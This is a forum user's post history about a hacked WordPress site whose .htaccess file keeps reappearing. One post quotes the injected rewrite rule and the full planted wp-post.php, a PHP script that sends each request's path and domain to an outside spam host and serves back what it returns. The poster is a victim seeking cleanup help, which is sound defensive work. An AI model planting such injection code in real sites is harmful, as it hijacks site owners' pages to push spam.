Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Messages - Barret Wallace

Pages: [1]
1
Web Oriented Coding / Re: .htaccess keeps re-appearing
« on: September 24, 2014, 09:05:41 pm »
Thank you!


@Factionwars: I already deleted a file that included an eval(...) expressions and obviously was malicious. Several WP-Plugins indicate that there is most probably no security risk anymore. Although you never now... ;-)


@proxx: audit would be great. However, I can only use ssh as a regular user and can not install or use this tool.


However, I just saw that the .htaccess file is recreated permanently. When I look at the timestamp, it shows always the current server time. Are there any logs that I can have a look at that might point me to the right direction?

2
Web Oriented Coding / Re: .htaccess keeps re-appearing
« on: September 23, 2014, 08:50:50 pm »
Hi and thank you very much for your thoughts.


It is a Linux Server (Kernel 2.6.x), which I can use through cPanel, FTP and ssh. The software that is infected is Wordpress. It was hijacked probably already months ago. As far as I can see, the hack "only" adds spam links (hidden by css) to the bottom of my page. Perhaps, I'll have no choice but re-install everything from scratch. However, I also want to understand and learn what happens and I also have to wait a couple of weeks before I can reinstall everything. Thus, I would very much appreciate if there is a chance to clean the mess as good as possible now.


This is what the 444 .htaccess inside the Wordpress root directory looks like:

Code: [Select]
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteRule ^(.*)\.html$ /wp-includes/wp-post.php [QSA,L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>


# END WordPressI can't delete this file. The wp-post.php is not a file originally created by Wordpress. The content looks like:


Code: [Select]
<?php
set_time_limit(0);
error_reporting(0);
function getContent($url){
 $output='';
 if(function_exists('curl_init')) {
 $time_out 30;
 $ch curl_init($url) ;  
 curl_setopt($chCURLOPT_RETURNTRANSFERtrue) ; 
 curl_setopt($chCURLOPT_BINARYTRANSFERtrue) ;   
 curl_setopt($chCURLOPT_CONNECTTIMEOUT$time_out) ;   
 $output curl_exec($ch) ;  
 curl_close($ch);   
}
 elseif(function_exists('file_get_contents')) {
 $output file_get_contents($url);
 }else{
 $info parse_url($url);  
 $fp fsockopen($info["host"], 80$errno$errstr3)or exit($errstr."--->".$errno);
 $head "GET ".$info['path']."?".$info["query"]." HTTP/1.0\r\n";  
 $head .= "Host: ".$info['host']."\r\n";  
 $head .= "\r\n";  
 $write fputs($fp$head);  
 while (!feof($fp))  
 {  
   $output.= fgets($fp);   
}
 return $output;
}
$domain =ereg_replace("^www\."""$_SERVER['SERVER_NAME']);
echo getContent('http://www.jameslebronbasketballshoes.com/file.aspx?f='.$_SERVER['REQUEST_URI'].'&d='.$domain);
?>I can't delete this file as well.

Any ideas how to find out which script or file or else re-creates the .htaccess file every time I delete it?

3
Web Oriented Coding / .htaccess keeps re-appearing
« on: September 22, 2014, 06:57:37 pm »
Hi,


I guess, my web site is a little bit hacked... I think, I replaced most of the malicious files, but the .htaccess file has certain (spam-oriented) rewrite rules. When I try to delete it, it doesn't work. The file has 444 permissions and every time I delete the file, it is re-created immediately. Unfortunately, I don't know by whom. Has anybody a clue how to proceed in order to get rid of it?

Pages: [1]